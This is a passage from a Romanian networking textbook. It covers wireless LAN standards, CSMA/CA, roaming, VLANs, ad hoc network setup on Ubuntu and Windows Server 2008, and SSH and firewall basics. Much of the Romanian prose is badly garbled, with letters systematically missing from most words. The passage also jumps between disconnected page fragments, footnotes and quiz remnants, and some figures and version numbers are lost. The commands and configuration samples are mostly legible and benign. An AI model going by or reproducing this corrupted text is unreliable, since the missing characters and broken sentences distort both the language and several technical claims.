ele di a da de . GHz. A esta a fost şi u ul di oti ele pe t u a e teh ologia de .
GHz a âştigat te e pe piaţa wireless.
Ta elul de ai jos si tetizează p op ietăţile u delo , p eze tate pâ ă a u :
1
Wi-Fi Allia e este u o so ţiu fo at di peste di t e ele ai a i ompanii din domeniul IT,
a â d a s op p o o a ea şi dez olta ea teh ologiilo wireless.
166 | ‘ e ţ e l e L o a l e
p oie tului, se aşteaptă a oul sta da d să fie fi alizat î de u sul a ului , el tâ ziu
2009.
Noul sta da d îşi p opu e să ofe e o a dă de M ps şi o ază de a ope i e de -4 ori
ai a e de ât a sta da delo a tuale. Î a elaşi ti p, p i ă i ea atei de t a sfe şi
i şo a ea ti pului de fu ţio a e a dispoziti ului, se a di i ua o su ul de e e gie.
Pe t u a eşte pe fo a ţele, sta da dul se azează pe teh ologia MIMO Multiple Input
Multiple Output a e foloseşte u siste de ai ulte a te e pe t u t a s isia şi e epţia
datelo . O e i ţă i po ta tă pe t u oul sta da d este păst a ea o pati ilităţii u
sta da dele deja e iste te . a/ /g. Astfel, u e hipa e t . a putea fu ţio a fie
în banda de 2,4 GHz, fie în banda de 5 GHz.
Î iuda faptului ă sta da dul u este deo a dată fi alizat, o se ie de p odu ăto i au fost
at aşi de pe fo a ţele teo eti e ofe ite de oua teh ologie şi au î eput deja să ofe e
p oduse azate pe e siu ea . ale spe ifi aţiilo te po a e.
O eţea ad hoc este echivalentul în Ethernet al u ei eţele full- esh, î a e fie a e staţie
este o e tată p i i te faţa wireless di e t la elelalte staţii. Cu alte u i te, t afi ul ge e at
de o staţie A, desti at u ei staţii B, t e e di e t de la A la B, fă ă u dispoziti i te edia .
Aute tifi area lie ților p esupu e e ifi a ea ide tităţii lie ţilo e do es să se o e teze
la reţea î azul î a e se foloseşte u e a is de se u itate spe ifi
La p i a ede e, o eptul de aso ie e de i el la o eţea poate su a o fuz. Î t -o
eţea u de p oto olul de i el este Ethernet, u e istă o eptul de eţea de i el . Î t -o
topologie . , oţiu ea de eţea e istă doa la i el supe io , la i el IP. Î să, î t -o eţea
wireless, o eptul de eţea e istă atât la i elul p oto olului . , ât şi la i elul
protocolului de nivel 3.
O eţea wireless, este ide tifi ată la i el 2, de un nume special, denumit în standard: SSID
(Service Set Identifier). Da ă u lie t do eşte să se aso ieze u o eţea wireless (termenul de
aso ie ea se efe ă i pli it la o e ti itate de i el , t e uie să u oas ă SSID-ul acestei
eţele. Majo itatea lie ţilo wireless pe it s a a ea ediului pe t u a găsi SSID-ul eţelelo
la a e se pot aso ia. După e o staţie s-a aso iat u ei eţele, se a fa e o cerere DHCP pentru
a o ţi e o ad esă IP. ‘ăspu sul la a eastă e e e a t e ui sa i ă fie de la un server DHCP
dedi at aflat pe o staţie î eţea, fie di e t de la AP î azul î a e AP-ul are deja integrat un
server DHCP).
Routerele wireless su t dispoziti e a e pot ealiza î a elaşi ti p fu ţiile u ui AP, u ui
s it h de i el şi u ui oute . A este e hipa e te su t p e ăzute u:
O a te ă wireless - pe t u î depli i ea fu ţiilo de AP
Unul sau mai multe porturi de LAN - aceste porturi sunt de fapt conectate într-un switch care
se află î ău t ul oute ului wireless, acesta fiind transparent pentru utilizatori. Porturile
a estea su t p eze te pe t u a putea ofe i şi fu ţio alitate de s it h, î t -o eţea î a e u
toate staţiile au i te feţe wireless. Între oricare dintre aceste porturi se face switching.
Un port de WAN – acest port este cel la a e se leagă o e iu ea de la I“P. Î t e a est po t şi
oricare dintre porturile de LAN, se face rutare.
Bridge-u ile sea ă ă foa te i e u access point-urile din punctul de vedere al arhitecturii
ha d a e. Ele su t folosite î să pe t u i te o e ta ea eţelelo p i t -o legătu ă wireless. Un
exemplu tipic de utilizare a bridge-u ilo este ealiza ea u ei o e iu i î t e două lădi i.
Un bridge, ase e i u ui AP, a e o i te faţă wired şi u a wireless: cadrele ce vin pe una
di t e i te feţe su t t a s ise ăt e ealaltă, u e e tuala t a slaţie î t e fo atele ad elo
elo două eţele. De ase e ea, u bridge poate de ide să u t a s ită ai depa te u
pa het î azul î a e ştie ă desti ata ul se află î eţeaua di a e a e it pa hetul. U
bridge î să, u pe ite aso ie ea odu ilo , de a eea, pe t u a o e ta ai ulte staţii
dotate u i te feţe wireless, este în continuare nevoie de un access point.
1
Uninterruptible power supply – dispoziti e a e î azul u ei pa e de u e t, pot ofe i e e gie ele t i ă,
fă ă a î t e upe flu ul de ali e ta e.
2
Distribution System – termenul este echivalent cu access point.
171 | W i r e l e s s
1
http://standards.ieee.org/getieee802/download/802.11-2007.pdf
172 | ‘ e ţ e l e L o a l e
5.1.6.2.1 CSMA/CA
În concluzie, nu putem folosi CSMA/CD pentru a asigura accesul la mediul wireless
pa tajat. “oluţia adoptată de sta da d se u eşte C“MA/CA (Carrier Sense Multiple
Access/Collision Avoidance). Fu ţio a ea a estui e a is se azează pe t i ite ea u ui
cadru special de ACK de la desti aţie la su să, după fie a e ad u . p i it la desti aţie.
Da ă după t i ite ea u ui ad u, u se p i eşte u ACK, se aşteaptă u ti p aleato şi se
î ea ă di ou să se t i ită ad ul pe t u a e u s-a primit ACK. “e a alizează modul în care
a eastă etodă ezol ă p o le a staţiei as u se:
“taţia A as ultă ediul şi u dete tează p eze ţa u ui se al î epe să t a s ită
“taţia C fa e e a t a elaşi lu u şi î epe şi ea să t a s ită
“e p odu e o oliziu e î t e ele două ad e şi i iu ul di ele u aju ge la staţia B, de i staţia
B nu trimite ACK i i staţiei A, i i staţiei C
A ele staţii aşteaptă u ti p p edefi it î a e aşteaptă ACK. Da ă ti pul de aştepta e
e pi ă a ele staţii o aştepta u ti p aleato iu u it DIF“ Distributed Interframe Spacing)
î ai te sa t a s ită di ou.
Ate ţie! deoarece în wireless, pe t u fie a e ad u t i is, se aşteaptă u ACK, banda
efe ti ă de a e se dispu e, este de la î eput î ju ătăţită.
O altă etodă de a es la ediu p e ăzută î C“MA/CA p esupu e folosi ea u o esaje
speciale de tip RTS (request to send şi CT“ clear to send . Folosi d a est e a is , o staţie
î t ea ă AP-ul da ă ediul de t a s isie este li e folosi d u esaj de tip ‘T“. A est ad u
ajunge doar la AP. AP-ul, fii d pu tul e t al al eţelei, u a e p o le a staţiei as u se. Da ă
mediul este liber, AP-ul t i ite u CT“ î a e spe ifi ă staţia e a o ţi ut pe isia de a
t a s ite. Mesajul de tip C“T aju ge la toate staţiile di eţea, u doa la ea a e a e ut
a es la ediu p i esajul ‘T“ a te io . Astfel staţia e do ea să t a s ită a p i i a es, iar
elelalte staţii o o side a ediul o upat de a easta.
173 | W i r e l e s s
5.1.6.4 Roaming
Colocalizarea mai ulto eţele poate fi folosită şi î alt s op: ă i ea a ope i ii şi e zii
u ei eţele wireless p i adăuga ea de access point-uri. Pentru a realiza acest deziderat, nu
este sufi ie t să adăuga ai ulte AP-u i la eţea aşa u pu e ai ulte e u i pentru a
fa e ai ultă lu i ă. Î o e tul î a e apa ai ulte access point-uri, automat se
eează ai ulte eţele wireless. Î o se i ţă, o apă ea oliziu i î t e ele da ă u folosi
canale disjuncte.
5-8: Roaming
174 | ‘ e ţ e l e L o a l e
Topologia di figu ă poa tă u ele de E““ Extended Service Set şi fu ţio ează astfel:
AP-u ile su t o e tate î a elaşi eţea Ethernet şi fu ţio ează espe ti pe a ale
disjuncte (1-7- . Astfel, â d o staţie i t ă î aza de a ope i e a eţelei, ea a fi aso iată AP-
ului u se alul el ai pute i di a ea zo a. Ai i se apli ă fu ţia de easo ie e a AP-urilor.
Da ă o pe soa ă u u PDA t a e sează de la stâ ga la d eapta eţeaua, PDA-ul va fi asociat pe
â d fie ă uia di t e AP-uri. Spre exemplu când semnalul de la access point-ul 1 devine prea
slab, adaptorul va fi intrat deja în raza access point-ului şi a fi aso iat a estuia fă ă
pie de ea o e iu ii la eţea. A est se i iu, a şi la telefo ia o ilă, poa tă u ele de
roaming.
Folosind o topologie ESS, nu se extinde doar aza eţelei, i şi se ofe ă ai ultă a dă
lie ţilo o ili. A easta pe t u ă fie a e AP ofe ă lie ţilo lui pâ ă la M ps, de i î total
ele vor constitui o eţea wireless u o a dă de M ps = 162 Mbps.
5.1.6.5 VLAN-uri
VLAN-u ile se o figu ează î ge e al pe s it hu i pe t u a putea o ţi e ai ulte
domenii de broadcast. Aceste VLAN-u i se pot e ti de şi î eţelele wireless prin maparea unui
SSID diferit pentru fiecare VLAN dorit . Prin aceasta ope aţie se o ţi e o i tualiza e a access
point-ului, a esta apă â d a ai ulte eţele dife ite. “i gu a li ita e este a toate eţele
t e uie să fu ţio eze pe a elaşi a al ă i u t a s iţăto wireless nu poate genera trafic pe
mai multe canale în acelaşi ti p. Bi eî ţeles ă u o i e AP a putea să supo te VLAN-uri. De
fapt, singurul lucru de care are nevoie AP-ul, este suport pentru protocolul 802.1q, pentru a
putea realiza un trunk1 cu switchul în care este legat. Unele AP-u i supo tă hia si tehnici de
QoS (802.1p2 pe t u a putea lasifi a i po ta ţa t afi ului di fie a e VLAN.
Un motiv important pentru care s-a do i e iste ţa VLAN-urilor pe AP-uri este separarea
eţelei wireless după dife ite p i ilegii de se u itate guest, user, VIP).
5-9: VLAN-uri
1
A se vedea capitolul 2
2
http://en.wikipedia.org/wiki/802.1p
175 | W i r e l e s s
1
http://www.ou.edu/committees/itc/policy/Guidelines_for_Passwords.html
177 | W i r e l e s s
1
http://ndiswrapper.sourceforge.net/joomla/
2
http://www.hpl.hp.com/personal/Jean_Tourrilhes/Linux/Tools.html
178 | ‘ e ţ e l e L o a l e
1. Op i ea i te feţei Ethernet.
Deşi u este u az des î tâl it, u ele d i e e wireless nu permit configu a ea eţelei da ă
dete tează o e ti itate pe o legătu a Ethernet, de i î ai te de a o figu a eţeaua ad hoc
trebuie decuplat cablul Ethernet.
2. Oprirea firewall-ului
T e uie asigu at ă u a eţi niciun firewall ( precum firestarter , i stalat şi ulâ d în
siste . Î U u tu e istă u firewall implicit numit iptables. Pe t u a fi sigu i ă eţeaua u a
fi lo ată de o egulă i t odusă a ide tal sau o egulă e lo hează ai ult de ât a t e ui
să o fa ă, se e o a dă şte ge ea ta elei de filt a e a iptables astfel:
waters@myr:-$ sudo iptables -F
3. Oprirea NetworkManager-ului
Apli aţia di U u tu e se o upă u ope aţiile lie tului de wireless se u eşte
NetworkManager. A easta a t e ui op ită î ai te de a fa e o i e o figu a e. Op i ea
programului se poate face prin apelarea scriptului numit 25NetworkManager cu parametrul
stop.
waters@myr:~$ sudo /etc/dbus-1/event.d/25NetworkManager stop
* Stopping network connection manager NetworkManager [ OK ]
Da ă pla a wireless nu apare în output, cel mai probabil Ubuntu nu a avut integrat un
d i e pe t u pla a de eţea. Î a est az t e uie ăutat pe site-ul p odu ăto ului u d i e
wireless, ia da ă u e istă d i e pe t u Li u , puteţi folosi soluţia NDISwrapper pentru a
instala un driver de Windows.
1
https://help.ubuntu.com/community/WifiDocs/WirelessCardsSupported
179 | W i r e l e s s
Notă: sintaxa comenzii iwconfig este: iwconfig <i te faţa_wireless> <parametru_ eţea>
<valoarea_parametrului>
Da ă i te faţa u apa e î ezultatul o e zii iwconfig, numele cu care sistemul
ide tifi ă a eastă o po e tă wifi0, wlan0, wireless0) poate fi aflat din consultarea
fişie ului /proc/net/dev.
waters@myr:~$ cat /proc/net/dev
Inter-| Receive | Transmit
face |bytes packets errs drop fifo frame compressed multicast|bytes packets errs
drop fifo colls carrier compressed
lo: 14016 184 0 0 0 0 0 0 14016 184 0 0 0 0 0 0
eth1: 1461444 10683 0 0 0 0 0 0 1034216 9140 0 0 0 0 0 0
U ătoa ele o e zi o t e ui i t oduse în ordinea în care sunt listate mai jos. Trebuie
a ut g ijă u se e ţie ea o e zilo ă i u ele o e zi pot afe ta setă ile ealizate a te io .
Pe t u a e ita p o le e de o figu a e e a putea apă ea di auza driver-ului, se va opri
i te faţa wireless î ai te de apli a ea pa a et ilo de eţea:
waters@myr:~$ sudo ifconfig wlan0 down
“pe ifi a ea tipului de eţea wireless se face cu ajutorul parametrului mode al comenzii
iwconfig.
waters@myr:-$ sudo iwconfig wlan0 mode adhoc
Parametrul mode are cea mai a e p io itate î o figu aţie şi t e uie i t odus
î totdeau a p i ul î se e ţa de o e zi de o figu a e. Valo ile sale ele a te su t:
master - a eastă aloa e dese ează i te faţa a fii d u a de AP. “e a folosi u ai da ă se
do eşte ealiza ea u ui se e Li u a e să poată fu ţio a a Access Point. “e e o a dă
consultarea WiFi-Docs1 pe t u posi ilitatea setă ii plă ii î a est od.
managed – a est od se foloseşte â d se do eşte o e ta ea la u AP î t -o eţea tip
i f ast u tu ă
ad hoc – spe ifi ă opţiu ea u ei eţele ad hoc
Într-o eţea adhoc se pot folosi şi alţi pa a et ii opţio ali ai o e zii iwconfig pentru a
seta bit-rate-ul, puterea de transmisie sau parametrii de securitate.
Pâ ă la a est pas, a fost o figu ată o eţea wireless e ofe ă o e ti itate de i el .
Pentru a putea asigura comunicare de nivel 7 trebuie o figu aţi, mai întâi, parametrii de
i el : ad esele IP de asigu a ea o e ti ităţii - se o upa sti a TCP/IP şi sistemul de
operare).
1
https://help.ubuntu.com/community/WifiDocs/MasterMode
180 | ‘ e ţ e l e L o a l e
Deci, se poate finaliza configurarea clientului wireless prin efectuarea unei cereri DHCP pe
i te faţa wlan0 cu ajutorul comenzii dhclient:
Co fo spe ifi aţiilo de ai sus, fişie ul de o figu a e pe t u eţeaua test a ată astfel:
auto wlan0
iface wlan0 inet dhcp
wpa-driver wext
wpa-ssid YoGi
wpa-ap-scan 1
wpa-proto WPA2
wpa-pairwise CCMP
wpa-group CCMP
wpa-key-mgmt WPA-PSK
wpa-psk a8a9c6966946c520a16d020e7590d1ad35d4de60332a22d7349264007194b0e9
1
Network Access Protection: http://technet.microsoft.com/en-us/network/bb545879.aspx
192 | ‘ e ţ e l e L o a l e
Fereastra Connect to a network, p i ipala etodă a esi ilă utilizato ilo i di iduali pe t u a-
şi o figu a o e iu ea la o eţea wireless
Politici de grup (Group policy) accesibile administratorilor într-un mediu Active Directory1
pe t u a o figu a e t alizat şi a dist i ui o figu aţia alto al ulatoa e e e ale
domeniului.
Li ie de o a dă, folosind utilitarul netsh.exe şi o a da netsh wlan, ce permite
o figu a ea a uală a eţelelo wireless. Netsh permite, de asemenea, exportarea
profilurilor wireless în fişie e l şi i po ta ea lo ulte ioa ă, e e tual pe alte siste e.
1
http://www.microsoft.com/windowsserver2008/en/us/active-directory.aspx
193 | W i r e l e s s
1
Dete ta ea u ei eţele wireless o oad asti g este posi ilă deoa e e u ele AP-uri pot fi configurate
astfel î ât să t i ită ad e de tip beacon având câmpul de SSID setat pe valoarea NULL. Mai multe detalii despre
cadrele beacon la http://en.wikipedia.org/wiki/Beacon_frame.
194 | ‘ e ţ e l e L o a l e
Opţiu ile dispo i ile la ipta e depi d, de ase e ea, şi de apa ilităţile i te feţei de
eţea wireless şi a d i e ului pe a e a easta îl foloseşte.
Security key / Passphrase: Se introduce cheia WEP î azul se u ităţii de tip WEP, cheia
partajata WPA sau WPA2 pentru variantele Personal ale acestora, iar pentru variantele
Enterprise şi 802.1x, heia se dete i ă auto at la ealiza ea aute tifi ă ii.
Start this connection automatically: Wi do s se a o e ta auto at la eţea â d a easta
este dete tată. Altfel, o e ta ea t e uie fa ută a ual p i fe east a Connect to a network.
195 | W i r e l e s s
1
Mai multe detalii despre tipurile de cadre în wireless la adresa:
http://www.wi-fiplanet.com/tutorials/article.php/1447501
196 | ‘ e ţ e l e L o a l e
1
De fapt, o eţea ad ho p esupu e o eţea wireless şi u a e se s î alt o te t.
197 | W i r e l e s s
Ate ţie! După u s-a e ţio at ai sus, după ea ea u ei eţele wireless sistemul se
o e tează auto at la ea, eea e i pli ă faptul ă o i e altă o e iu e wireless ce era a ti ă
î a el o e t a fi de o e tată.
Da ă u se ifează opţiu ea Save this network (figura 5-23 p ofilul eţelei ou eate a fi
şte s auto at î o e tul î a e ulti ul lie t se de o e tează de la ea sau când cel care a
eat eţeaua se de o e tează sau iese di aza elo lalto lie ţi.1
1
Puteţi iti u a ti ol i te esa t desp e pe i olele eţelelo ad ho la
http://www.windowsecurity.com/whitepapers/Dangers-Ad-Hoc-Wireless-Networking.html
199 | W i r e l e s s
Unknown CCMP
WPA-Enterprise TKIP
WPA-Personal TKIP
WPA-Enterprise CCMP
WPA-Personal CCMP
Authentication and cipher supported in ad-hoc mode:
WPA2-Personal CCMP
Open None
Open WEP
[...]
Pe t u afişa ea listei eţelelo wireless configu ate, e hi ale tul listei o ţi ute p i
i te faţa Connect to a network, se poate folosi comanda netsh wlan show profiles:
PS C:\Users\Administrator> netsh wlan show profiles
Profiles on interface Wireless Network Connection:
Group Policy Profiles (read only)
---------------------------------
<None>
User Profiles
-------------
All User Profile : DLINK_WIRELESS
All User Profile : ccielab
All User Profile : nnet
Afişa ea u ei liste a eţelelo wireless detectate se face prin comanda netsh wlan show
networks:
PS C:\Users\Administrator> netsh wlan show networks
Interface Name : Wireless Network Connection
There are 5 networks currently visible.
SSID 1 : YoGi
Network type : Infrastructure
Authentication : WPA-Personal
Encryption : CCMP
SSID 2 : ccielab
Network type : Infrastructure
Authentication : WPA2-Personal
Encryption : CCMP
SSID 3 : Bee
Network type : Infrastructure
Authentication : Open
Encryption : WEP
[...]
200 | ‘ e ţ e l e L o a l e
Atât î azul adăugă ii ât şi î azul şte ge ii de filtre, utilizarea parametrului ssid este
e esa ă doa pe t u alo ile de allow sau block ale parametrului permission. Da ă se
eează sau se şte ge u filt u u pe isiu ea denyall, parametrul ssid nu trebuie inclus.
Definirea profilurilor wireless este, de ase e ea, posi ilă p i i te ediul lui netsh wlan.
Pe t u a adăuga sau şte ge p ofilu i se foloses pa a et ii add profile sau delete profile,
a î e e plele u ătoa e, pe t u adăuga e, espe ti , şte ge e de p ofilu i:
netsh wlan add profile filename=”my_wlan_profile.xml” interface=”Wireless Network
Adapter” user=all
netsh wlan delete profile name=”linksys_profile interface=”Wireless Network Adapter”
user=all
Adăuga ea p ofilu ilo e esită spe ifi a ea fişie ului di a e să fie î ă ate setă ile. Din
a est fişie se î a ă şi u ele p op iu-zis al profilului, ce este folosit mai apoi pentru
o a da de şte ge e. T e uie ţi ut o t de faptul ă setă ile sto ate î fişie e de tip p ofil u
su t î ă ate de ât la o e zi de tip add profile, configu aţia u e tă fii d sto ată î
siste ul de ope a e, astfel ă odifi a ea u ui fişie p ofil fă ă î ă a ea lui nu va avea niciun
efect (cu alte cuvinte, u su t o side ate fişie e de o figu a e .
Parametrul interface este opţio al î a ele azu i şi e e folosi ea u ui u e de
i te faţă o fo odului î a e ele su t afişate p i o a da netsh wlan show
interfaces. Î o e tul folosi ii lui, adăuga ea sau şte ge ea p ofilu ilo a a ea efe t doa
pe i te faţa espe ti ă. De ase e ea, spe ifi a ea parametrului user este opţio ală şi a
efe tua odifi ă ile pe t u utilizato ul espe ti . Altfel, o e zile de ea e sau şte ge e
profiluri se vor aplica doar utilizatorului curent.
Pe t u şte ge ea p ofilu ilo , o ite ea pa a et ului interface va avea a efe t şte ge ea
p ofilului espe ti de pe toate i te feţele a ti e.
Server 2008 se a o e ta auto at la eţelele wireless p i i te faţa o espu zătoa e. I pli it,
acest serviciu este activ.
U e e plu de utilza e este u ăto ul:
netsh wlan set autoconfig enabled=yes inteface=”Wireless Network Adapter”
Parametrul enabled poate accepta valoarea yes sau no, ia e ţio a ea i te feţei este
obligatorie.
Comanda set profileorder ofe ă posi ilitatea de a at i ui p io ităţi p ofilu ilo
o figu ate pe t u a defi i o di ea î a e se p efe ă o e ta ea p i a estea.
Exemplul u ăto defi eşte p io itatea pe t u u a u it p ofil de pe o a u ită
i te faţă:
netsh wlan set profileorder name=linksys_profile interface=”Wireless Network Adapter”
priority=2
Activarea sau dezactivarea modului tracing se face prin specificarea parametrului mode
î p eu ă u alo ile yes sau no. Deoarece comportamentul implicit al tracing-ului este de a se
deza ti a î o e tul esta tă ii siste ului, pe t u e ţi e ea sa a ti ă di o e tul
aute tifi ă ii utilizato ilo este e esa ă i lude ea modului persistent.
ServiceName : BCM43XX
MACAddress : 00:19:7E:11:91:64
AdapterType : Ethernet 802.3
DeviceID : 7
Name : Dell Wireless 1390 WLAN Mini-Card #3
NetworkAddresses :
Speed : 11000000
203 | W i r e l e s s
După e s-a o ţi ut efe i ţa la o ie tul eat, a estuia i se pot seta dife ite p op ietăţi sau
i se pot apela metodele. Pe t u o listă o pletă a p op ietăţilo şi etodelo dispo i ile se
poate trimite obiectul nou creat comenzii Get-Member:
PS C:\Users\Administrator> $my_wireless | Get-Member
Î tre ări
1. Cel ai popula sta da d WLAN, î o e tul de faţă, este:
802.11a
802.11b
802.11g
802.11n
4. Î eod de fu ţio a e t e uie o figu ată pla a de eţea u ajuto ul utilita ului
iwconfig pentru a se putea realiza capturi de trafic:
Monitor
Managed
Ad-hoc
Promiscuous
Ifconfig
iproute2
iwconfig
route
CSMA/CD
CSMA/CA
Wireless CSMD
CSMW
205 | W i r e l e s s
6 Securitate şi monitorizare
Ce se î vaţă di acest capitol?
Fu ţio a ea p oto olului ““H
Co figu a ea de ază şi a a sată a p oto olului ““H
Fu ţio a ea u ui firewall
Co figu a ea de ază şi a a sată de filt a e de pa hete
Configurarea Wireshark
Configurare snort
Configurare Windows Firewall
Monitorizare în Windows
Cine este...
Bruce Schneier este u spe ialist î se u itate. “ h eie este auto ul Applied
C ptog aph și P a ti al C ptog aph . “ h eie a p oie tat sau o t i uit la
proiectarea mai multor algoritmi de criptare precum Blowfish, Twofish, Helix. În acest
o e t, “ h eie este C“TO la BT Cou te pa e, o pa ie pe a e a î fii ţat-o.
Daniel J. Bernstein este ate ati ia și p og a ato . A tual e te este p ofeso la
Universitatea din Illi ois. Be stei este auto ul ail, pu li file și dj d s. Be stei a
pu li at u u ă i po ta t de a ti ole î ate ati ă. Be stei este auto ul i liote ii
ate ati e dj fft folosită pe t u al ulul FFT.
Theo de Raadt este fo dato ul și o du ăto ul p oie telo Ope B“D și Ope ““H. De
Raadt a fo dat Ope B“D după e a pă ăsit p oie tul NetB“D. P oie telo Ope B“D și
de i ate su t u os ute pe t u p eo upa ea pe t u se u itate. O pe so alitate a azi ă,
Theo de Raadt a a ut o fli te u alţi e i di comunitatea open-source, dar îi sunt
e u o ute e itele î p o o a ea d i e elo f ee soft a e și a odelului des his de
dezvoltare.
1
Capitolul de “e u itate di Co pute Net o ks, ediţia a pat a, Ta e au .
207 | “ e u i t a t e ş i o ito iza e
Î p eze t, e istă două e siu i ale a estui p oto ol. P i a e siu e, ““H- , a fost la sată
î , âştigând rapid popularitatea utilizatorilor. În 1996, apare SSH- , o es ie e i teg ală
a p i ei e siu i, i o pati ilă u p i a e siu e, adu â d î u ătăţi i su sta ţiale î
p o esul de s hi a e a heilo şi î asigu a ea i teg ităţii datelo . P i ipalele dife e ţe
di t e ele două e siu i su t listate î ta elul de ai jos:
6.1.1.1 Instalare
Cea ai popula ă i ple e ta e a p oto olului ““H o ep ezi tă pa hetul OpenSSH, un
proiect open source, la sat şi eat de ei de la Ope B“D. Î p eze t, ea ai ouă e siu e de
OpenSSH este . p , la sată pe septe ie .
Pachetul ssh este compus dintr-un server (sshd), un client (ssh - disponibil implicit pe
ajo itatea dist i uţiilo şi u set de utilita e, pe t u gestiu ea heilo . Î ge e al sshd este
po it de s iptu ile de i iţializa e ale siste ului şi ulează pe a e t î background.
I stala ea se e ului ““H i lude i stala ea u o odule adiţio ale u a fi:
sshd – componenta server
ssh-keygen – utilitar folosit pentru generarea cheilor
ssh-keyscan – utilitar folosit pentru administrarea cheilor publice
scp – utilitar pe t u opie ea sigu ă de fişie e
ssh-agent – o po e ta folosită pe t u sal a ea heilo p i ate et .
root@myr:~# apt-get install ssh
Reading package lists... Done
Building dependency tree... Done
The following extra packages will be installed:
openssh-server
Suggested packages:
1
https://honor.trusecure.com/pipermail/firewall-wizards/1998-June/002845.html
208 | ‘ e ţ e l e L o a l e
rssh
The following NEW packages will be installed:
openssh-server ssh
0 upgraded, 2 newly installed, 0 to remove and 0 not upgraded.
Need to get 206kB of archives.
After unpacking 586kB of additional disk space will be used.
Do you want to continue [Y/n]? y
[...]
Setting up openssh-server (4.2p1-7ubuntu3) ...
Creating SSH2 RSA key; this may take some time ...
Creating SSH2 DSA key; this may take some time ...
* Restarting OpenBSD Secure Shell server... [ ok ]
Pe prima linie sunt trecute numele serverului de la dista ţă şi ad esa IP a a estuia, apoi
u â d heia pu li ă. Î e e plul de ai sus e istă două se e e la a e utilizato ul s-a
o e tat î p eala il şi a ă o heie pu li ă a fost sal ată.
A este hei se pot afla î două lo u i di siste ul de fişie e:
/etc/ssh/ssh_known_hosts, fişie a ă ui lo aţie poate fi s hi ată alte a ea di e ti ei
GlobalKnownHostsFile di fişie ul de o figu a e /etc/ssh/ssh_config.
$HOME/.ssh/known_hosts, fişie a ă ui lo aţie poate fi s hi ată p i alte a ea di e tivei
UserKnownHostsFile di a elaşi fişie de o figu a e.
Î aptu a de ai jos se poate o se a u la p i a o e iu e ealizată la u se e ,
lie tul eţi e a p e ta a estuia î fişie ul known_hosts:
Warning: Permanently added 'localhost' (RSA) to the list of known hosts.
student@localhost's password:
Linux ubuntu 2.6.15-26-386 # 1 PREEMPT Thu Aug 3 02:52:00 UTC 2006 i686 GNU/Linux
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
student@localhost's password:
Linux ubuntu 2.6.15-26-386 # 1 PREEMPT Thu Aug 3 02:52:00 UTC 2006 i686 GNU/Linux
Pe t u a păst a u ele o igi al al fişie ului e t e uie opiat se o ite spe ifi a ea oului
nume.
root@myr:~# scp test.txt user@anaconda.cs.pub.ro:
T a sfe a ea u ei o e iu i TCP/IP p i a alul sigu ofe it de ““H poate fi spe ifi ată fie
di li ia de o a dă, fie di fişie ele de o figu a e. O apli aţie posi ilă a edi e tă ii TCP/IP
este trecerea de un firewall în vederea citi ii poştei ele t o i e.
Utilitarul ssh e ţi e şi e ifi ă auto at o ază de date u ide tifi ă ile azate pe ‘“A ale
tutu o aşi ilo pe a e utilizato ul s-a o e tat. Baza de date este ţi ută î
.ssh/known_hosts. Da ă i fo aţia de ide tifi a e a u ui se e se s hi ă, ssh afişează u
a e tis e t şi u pe ite aute tifi a ea utilizato ului pe t u a p e e i u ate tat la pa ola lui.
Opţiu ea StrictHostKeyChecking poate fi folosită pe t u a p e e i aute tifi ă ile pe aşi i
ale ă o hei u su t u oscute sau care au fost schimbate.
213 | “ e u i t a t e ş i o ito iza e
După e sa confirmat ă po tul a fost des his, se poate realiza o conexiune prin
tunelul SSH deschis.
root@myr:/root/.ssh# ssh -p 7777 -l cico localhost
Password:
Last login: Sat Sep 22 13:58:01 2007 from 86.121.174.62
Linux anaconda 2.6.18-4-686 # 1 SMP Wed May 9 23:03:12 UTC 2007 i686
[....]
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
6.2 Firewall
P o a il ă el ai u os ut dispoziti de se u itate este firewall-ul. P i defi iţie,
firewall-ul este u siste sau u g up de siste e a e i ple e tează politi a de acces între
două sau ai ulte eţele. Firewall-urile pot fi clasificate în patru mari clase: firewall-uri
dedicate, firewall-uri integrate în routere, firewall-u i i teg ate î se e e şi firewall-uri
personale.
Firewall-urile dedicate su t aşi i e ulează u siste de ope a e spe ial o eput
pe t u filt a ea de pa hete şi t a slata ea de ad ese. E e ple de astfel de firewall-uri sunt
sistemele PIX sau CheckPoint. A este siste e su t apa ile să susţi ă u u ă a e de
o e iu i, da fa ilităţile de uta e su t e t e de li itate. Pe t u o eţea si plă se poate
folosi firewall-ul a oute , î să pe t u eţele ai o ple e este e esa u oute .
Firewall-urile integrate în routere su t folosite pe t u a î lătu a eaju sul a te io . Ele
u pot susţi e a elaşi u ă de o e iu i, da se des u ă ai i e î topologii ai o ple e,
216 | ‘ e ţ e l e L o a l e
unde este e oie de fa ilităţile u ui oute . Multe p oduse ofe ă fa ilităţi de firewall integrate
în routere, de la module de firewall pentru routere high-end, pâ ă la oute ele extrem de
o pa te, dedi ate utiliză ii î eţele “OHO1.
Firewall-urile de server su t i ple e tate a u soft a e adiţio al peste u siste de
ope a e de eţea Li u , NT, Wi K, No ell, UNIX . E e ple de astfel de pa hete soft a e
sunt: Netfilter, Microsoft ISA Server, Novell Border Manager. Ele su t o pa a ile a fa ilităţi
şi pe fo a ţe u firewall-urile integrate în routerele de nivel mediu.
Firewall-urile personale sunt instalate pe calculatoarele personale. Ele sunt concepute
pentru a preveni ata u i doa asup a al ulato ului pe a e ulează. Este i po ta t de eţi ut
ă a este tipu i de firewall-u i u su t opti izate pe t u eţele î t egi de al ulatoa e.
Exemple de firme ce produc firewall-uri personale sunt McAfee şi Symantec.
Principalele mecanisme prin care un firewall asigu ă p ote ţia eţelei su t filt a ea de
pa hete şi t a slata ea de ad ese, care vor fi analizate mai pe larg în continuare.
1
Small Office Home Office
217 | “ e u i t a t e ş i o ito iza e
Pachetul poate fi ide tifi at după ad esa su să, ad esa desti aţie, tipul pa hetului, po tul
TCP, UDP sau tipul esajului ICMP , i te faţa pe a e i t ă/iese pa hetul, da ă este
fragment dintr-u pa het, da ă este pa het a e i iţiază o o e iu e TCP .
La ţu ile su t setu i de eguli p i i te ediul ă o a se dete i ă e a ţiu e t e uie
luată asup a u ui pa het. Pe t u fie a e di t e ta elele defi ite filter, nat, mangle)
e istă la ţu i i pli ite INPUT, OUTPUT, FORWARD, PREROUTING, POSTROUTING e asigu ă o
st u tu ă dist i uită a egulilo . Cu alte u i te, la ţu ile p edefi ite u a a te izează o
